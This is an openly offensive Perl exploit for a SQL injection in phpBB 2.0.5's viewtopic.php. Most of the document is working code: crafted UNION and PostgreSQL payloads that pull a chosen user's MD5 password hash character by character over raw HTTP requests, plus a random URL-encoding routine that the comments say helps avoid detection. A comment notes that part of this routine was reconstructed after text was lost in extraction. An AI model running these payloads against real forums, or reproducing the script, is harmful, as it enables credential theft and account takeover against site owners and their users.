Phpbb 2.0.5 Sql Injection Password disclosure Exploit

#!/usr/bin/perl -w
##
# phpBB password disclosure vuln.
# rick patel
##
# There is a SQL injection vuln in the /viewtopic.php file. The variable $topic_id
# gets passed directly to the SQL server in a query. An attacker can pass a special SQL string
# which can be used to see the md5 password hash of any user (!) of phpBB. This hash can later be
# used with autologin or cracked using john.
##
# Details:
##
# this is the checking done for $topic_id in viewtopic.php:
##
#   if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )
#   {
#       $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);
#   }
#   else if ( isset($HTTP_GET_VARS['topic']) )
#   {
#       $topic_id = intval($HTTP_GET_VARS['topic']);
#   }
##
# ok... no else statement at the end.
# now if GET[view] = newest and GET[sid] is set, this query gets executed:
##
#   $sql = "SELECT p.post_id
#       FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . USERS_TABLE . " u
#       WHERE s.session_id = '$session_id'
#           AND u.user_id = s.session_user_id
#           AND p.topic_id = $topic_id
#           AND p.post_time >= u.user_lastvisit
#       ORDER BY p.post_time ASC
#       LIMIT 1";
##
# $topic_id gets passed directly to the query. So how can we use this to do something important? Well,
# I decided to use UNION and create a second query that will get us something useful. There were a couple of
# problems I ran into. first, phpBB only cares about the first row returned. second, the select for the first
# query is p.post_id which is int, so int becomes the type returned for any other query in the union. third,
# there is the rest of the junk at the end, "AND p.post_time >= ...". We tell mysql to ignore that by placing /*
# at the end of our injected query. So what query can we make that returns only an int?
# this one => select ord(substring(user_password,$index,1)) from phpbb_users where user_id=$uid
# Then all we have to do is query 32 times with $index from 1 - 32 and we get the ord value of all chars of the
# md5 hash password.
##
# I have only tested this with mysql 4 and pgsql. Mysql 3.x does not support unions so you would have to tweak
# the query to do anything useful.
##
# This script is for educational purpose only. Please dont use it to do anything else.
##
# To fix this bug: http://www.phpbb.com/phpBB/viewtopic.php?t=112052

use IO::Socket;

$remote     = shift || 'localhost';
$view_topic = shift || '/phpBB2/viewtopic.php';
$uid        = shift || 2;
$port       = 80;
$dbtype     = 'mysql4';   # mysql4 or pgsql

print "Trying to get password hash for uid $uid server $remote dbtype: $dbtype\n";

$p = "";

# One request per hash character: the injected query returns ord() of the
# character at $index, and phpBB reflects it back as the post id in its redirect.
for ($index = 1; $index <= 32; $index++)
{
    $socket = IO::Socket::INET->new(PeerAddr => $remote,
                                    PeerPort => $port,
                                    Proto    => "tcp",
                                    Type     => SOCK_STREAM)
        or die "Couldnt connect to $remote:$port : $@\n";

    # sid=1 is a session that does not exist, so the original SELECT matches no rows
    # and the UNIONed row is the first (and only) one phpBB sees.
    $str = "GET $view_topic" . "?sid=1&topic_id=1" . random_encode(make_dbsql()) . "&view=newest" . " HTTP/1.0\r\n";

    print $socket $str;
    print $socket "Cookie: phpBB2mysql_sid=1\r\n";   # replace this for pgsql or remove it
    print $socket "Host: $remote\r\n\r\n";

    while ($answer = <$socket>)
    {
        if ($answer =~ /Location:.*\x23(\d+)/)   # Matches the Location: viewtopic.php?p=<num>#<num>
        {
            $p .= chr($1);
        }
    }
    close($socket);
}

print "\nMD5 Hash for uid $uid is $p\n";

# random encode str. helps avoid detection
sub random_encode
{
    $str = shift;
    $ret = "";
    # Loop body lost in extraction; reconstructed to percent-encode spaces always
    # (a raw space would end the request line) and other characters at random,
    # which is what the comment above describes.
    for ($i = 0; $i < length($str); $i++)
    {
        $c = substr($str, $i, 1);
        if ($c eq ' ' || int(rand(2)))
        {
            $ret .= sprintf("%%%02x", ord($c));
        }
        else
        {
            $ret .= $c;
        }
    }
    return $ret;
}

sub make_dbsql
{
    if ($dbtype eq 'mysql4')
    {
        return " union select ord(substring(user_password," . $index . ",1)) from phpbb_users where user_id=$uid/*";
    }
    elsif ($dbtype eq 'pgsql')
    {
        return "; select ascii(substring(user_password from $index for 1)) as post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false";
    }
    else
    {
        return "";
    }
}